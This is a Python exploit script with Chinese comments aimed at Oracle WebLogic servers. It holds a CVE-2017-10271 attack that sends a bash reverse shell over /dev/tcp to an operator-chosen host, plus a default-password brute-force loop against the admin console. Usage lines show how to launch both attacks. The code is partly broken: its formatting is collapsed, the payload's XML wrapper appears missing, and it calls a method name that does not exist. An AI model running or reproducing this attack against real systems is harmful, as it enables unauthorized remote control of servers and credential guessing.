"""暂时只试用于Linux,先试试用一下反弹shell CVE-2017-10271的EXp"""import requestsimport sysclass Weblogic : def __init__(self,host,port,url) : self.url=url self.host=host self.port=port def CVE_2017_10271_Shell(self): url=self.url+"/wls-wsat/CoordinatorPortType" port=self.port host=self.host header={ "Accept":"*/*","Accept-Language":"en","User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)","Content-Type":"text/xml","Connection":"close","Host":self.url.replace("http://","")} data=""" /bin/bash -c bash -i >& /dev/tcp/{}/{} 0>&1 """.format(self.host,self.port) Mikasa=requests.post(url,headers=header,data=data) print("请查看有没有获得Shell!!") def Shell_Cmd(self) : pass def Weak_Password(self): password=['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem','mary'] url=self.url+"/console/j_security_check" for user in password : for pwd in password : data={ "j_username":user,"j_password":pwd,"j_character_encoding":"UTF-8"} test=requests.post(url,data=data,allow_redirects=False,verify=False) if 'console' in test.text and 'LoginForm.jsp' not in test.text : print("存在弱口令!!!!") print("user:"+user+" password:"+pwd) exit()if __name__=='__main__' : exp=Weblogic(sys.argv[3],sys.argv[4],sys.argv[1]) if sys.argv[2]=="CVE_2017_10271_Shell": exp.Reverse_Shell() elif sys.argv[2]=="Cmd": pass elif sys.argv[2]=="Weak_Password" : exp.Weak_Password() else : print("去屎吧2333333") print("CVE-2018-2628以及CVE-2018-2894也要去试试看,自己暂时还写不出这两个的exp") 使用方法:
反弹shell : python3 exp.py http://xxxx:7001/ CVE_2017_10271_Shell host port(后面的是你自己反弹Shell的主机ip以及端口)
Weak密码检测: python3 exp.py http://xxxx:7001/ Weak_Password xxx xxx (因为用的是类的构造函数整的,所以在进行其他方面的测试的时候会导致后面多一些东西,填任意的即可QAQ)